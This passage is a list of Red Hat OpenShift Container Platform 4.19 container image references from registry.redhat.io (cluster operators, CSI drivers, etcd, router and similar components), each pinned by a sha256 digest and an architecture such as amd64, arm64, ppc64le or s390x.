"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
